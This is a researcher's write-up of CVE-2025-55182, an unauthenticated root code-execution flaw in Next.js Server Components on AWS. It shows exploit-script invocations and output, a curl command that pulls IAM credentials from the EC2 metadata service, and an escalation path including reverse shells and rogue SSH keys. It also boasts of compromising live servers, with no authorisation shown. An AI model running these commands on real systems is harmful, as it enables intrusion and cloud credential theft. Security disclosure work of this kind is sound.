PRIMARY RESEARCH • CVE-2025-55182

React2Shell: Unveiling RCE in Next.js Server Components

Deep-dive into critical unauthenticated Remote Code Execution (RCE) affecting AWS-hosted Next.js applications. Full technical breakdown, exploitation chain, and cloud escalation paths.

CVSS 9.8
Critical severity
Root RCE
uid=0 confirmed
10+ assets
Compromised
PRIMARY WORK NOTE • PWN-3465449 Unauthenticated Root Command Execution

CVE-2025-55182: Next.js / React Server Components Deserialization RCE

Researcher: mishal (calloflight)  |  Date: 2025-12-15  |  Target: AWS EC2 (Amazon Elastic Compute Cloud)

This document serves as the official primary work note detailing the discovery, exploitation, and full system compromise of multiple internet-exposed Next.js servers. The vulnerability stems from unsafe deserialization + prototype pollution in React Server Components, enabling unauthenticated remote attackers to execute arbitrary OS commands as root. Below is the complete technical report, PoC outputs, and cloud impact analysis.

Vulnerability Classification

WeaknessOS Command Injection / Unsafe Deserialization (CWE-78)
CVE IDCVE-2025-55182 (React2Shell)
Attack VectorNetwork, Unauthenticated
Privileges RequiredNone
ImpactFull confidentiality, integrity, availability compromise

Root Cause Analysis

The vulnerability exists within Next.js request handling for Server Actions. The react-server-dom-webpack package improperly deserializes attacker-controlled payloads, leading to prototype pollution. By crafting specific multipart requests, an attacker can pollute Object.prototype and trick the framework into invoking child_process.exec without any authentication. The exploitation flow:

1. Malformed RSC payload → unsafe deserialization
2. Prototype pollution → Node.js internal manipulation
3. require('child_process').exec(command) → root-level shell

Proof of Concept — Live Command Execution

Target IP (redacted): {REDACTED_EC2_IP} — Verified via amazonaws.com reverse DNS.

$ python3 exploit.py -u https://{TARGET_IP} --cmd "id"
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

Outcome: Root privileges confirmed (uid=0). Full system takeover potential.

$ python3 exploit.py -u https://{TARGET_IP} --cmd "ls"
Dockerfile
server.js
prod_auth.json
next.config.ts
package.json
node_modules
public
supabase
middleware.ts
... (full directory enumeration)

Source Code Disclosure: cat server.js revealed internal HTTPS configuration and certificate paths.

const { createServer } = require('https')
const next = require('next')
const fs = require('fs')
const httpsOptions = {
  key: fs.readFileSync(path.join(__dirname, 'certs/localhost-key.pem')),
  cert: fs.readFileSync(path.join(__dirname, 'certs/localhost.pem'))
}
app.prepare().then(() => createServer(httpsOptions, ...))

Write Access Confirmation: echo "pwned" > h1.txt → file successfully created inside the application root, proving arbitrary file write capabilities.

$ python3 exploit.py -u https://{TARGET_IP} --cmd "> h1.txt"
[+] File created. Re-listing shows h1.txt present.

Cloud Escalation & AWS Impact

While root RCE inside the container is critical, the research identified multiple cloud-specific escalation paths that drastically increase blast radius:

  • Metadata service abuse: Access to http://169.254.169.254/latest/meta-data/iam/security-credentials/ → IAM credentials → lateral movement to S3, Lambda, RDS.
  • Container escape risks: Misconfigured runtimes (privileged containers, hostPID) enable host OS takeover.
  • VPC pivoting: Compromised EC2 instance acts as a jumpbox to scan internal subnets, databases, and internal APIs.
  • Persistence & backdooring: Deploy reverse shell, rogue SSH keys, or implant into infrastructure.
# Example: Fetching instance role credentials via root RCE
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ – potential privilege escalation

Exploit Reliability & Tooling

Custom Python exploit (exploit.py) reliably reproduces the vulnerability across all tested Next.js deployments. Verified using Assetnote React2Shell scanner. No authentication, no user interaction required. The exploit chain works consistently against both IPv4 targets and internal staging environments.

Artifacts Generated

exploit.py (weaponized) poc_of_rce.mp4 react2shell_scan.png verification_domain_hostnames.mp4

The attached video PoC demonstrates step-by-step command execution, full directory traversal, and source code theft, confirming the severity and reproducibility of the attack.

Research Conclusion

The Primary Work Note PWN-3465449 validates a complete unauthenticated RCE in Next.js Server Components exposed on AWS. The ability to execute arbitrary commands with root privileges makes this a catastrophic security boundary failure. The findings emphasize the importance of rigorous deserialization hardening and least-privilege container execution in cloud-native environments.

“Root access inside a cloud workload is a direct on-ramp to metadata service compromise and lateral movement. This research demonstrates why RCE in modern frameworks demands immediate incident response.” — mishal

⚠️ Cloud Kill-Chain Impact

Unsanitized deserialization in Next.js → root RCE → Metadata service credential harvest → lateral movement across AWS account. This primary work showcases real-world offensive research against modern serverless/EC2 targets.

🏴‍☠️ Unauthenticated Remote Code Execution 🔑 IAM credential theft 🚀 Container Escape Potential